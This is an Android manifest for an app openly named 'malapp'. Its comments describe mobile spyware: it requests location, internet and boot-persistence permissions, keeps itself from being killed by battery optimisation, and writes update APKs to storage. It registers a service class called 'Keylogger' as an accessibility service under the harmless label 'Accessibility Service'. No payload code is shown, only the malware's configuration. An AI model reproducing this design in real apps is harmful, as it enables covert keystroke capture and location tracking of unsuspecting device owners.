<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.posseggs.malapp">

    <!-- Permissions for the malapp -->
    <uses-permission android:name="REQUEST_IGNORE_BATTERY_OPTIMIZATIONS" /> <!-- So battery optimisation manager does not kill app -->
    <uses-permission android:name="android.permission.INTERNET" /> <!-- For internet access  -->
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" /> <!-- For persistence -->
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" /> <!-- To write update apk to sd card -->
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" /> <!-- To read location of device -->


    <application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:roundIcon="@mipmap/ic_launcher_round"
        android:supportsRtl="true"
        android:theme="@style/AppTheme">
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <service android:name=".Keylogger"
            android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE"
            android:label="Accessibility Service">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService" />
            </intent-filter>
            <meta-data
                android:name="android.accessibilityservice"
                android:resource="@xml/service_accessibility_config" />
        </service>
        <!-- Receiver that will trigger every time the phone boots-->
        <receiver android:name=".BootReceiver">
        <intent-filter >
            <action android:name="android.intent.action.BOOT_COMPLETED"/>
        </intent-filter>
    </receiver>
    </application>

</manifest>